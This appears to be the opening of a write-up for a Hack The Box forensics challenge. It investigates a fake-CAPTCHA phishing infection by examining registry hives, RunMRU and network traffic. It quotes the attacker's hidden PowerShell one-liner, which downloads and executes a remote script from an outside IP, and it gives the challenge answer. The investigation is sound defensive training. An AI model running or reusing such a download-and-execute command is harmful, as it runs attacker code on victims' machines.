Scenario

Happy Grunwald contacted the sysadmin, Alonzo, because of issues he had downloading the latest version of Microsoft Office. He had received an email saying he needed to update, and clicked the link to do it. He reported that he visited the website and solved a captcha, but no office download page came back. Alonzo, who himself was bombarded with phishing attacks last year and was now aware of attacker tactics, immediately notified the security team to isolate the machine as he suspected an attack. You are provided with network traffic and endpoint artifacts to answer questions about what happened.

https://app.hackthebox.com/sherlocks/774


**From the scenario we know the victim (Happy Grunwald) solved a fake CAPTCHA, a phishing technique used by lummna stealer. The infection chain likely involved a malicious PowerShell one liner executed from the Run dialog (Win+R). For more details about this technique, you can watch this YouTube video: https://www.youtube.com/watch?v=lSa_wHW1pgQ**

Based on this, useful artifacts to examine include browsing history and downloads, the RunMRU registry key (which lists recent commands or executables run via the Run dialog), PowerShell logs and related Event Viewer entries, as well as the captured network traffic.

we are provided with lots of registry hives , prefetch folder and a pcap

will focus on the victim (happy.grunwald) folder

Screenshot 2025-09-03 000552.png


1- It is crucial to understand any payloads executed on the system for initial access. Analyzing registry hive for user happy grunwald. What is the full command that was run to download and execute the stager.

powershell -NOP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')"

Screenshot 2025-09-03 000936.png

Screenshot 2025-09-03 000948.png

we will load the victim registry file using registry explorer then we will look for RunMRU (Lists the most recent commands or executables run via the Run dialog.) we can find it in this path

HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU

or under the bookmark tab we will find its a a malicious powershell command reaching out to an external ip to download a powershell script called office2024install.ps1 to execute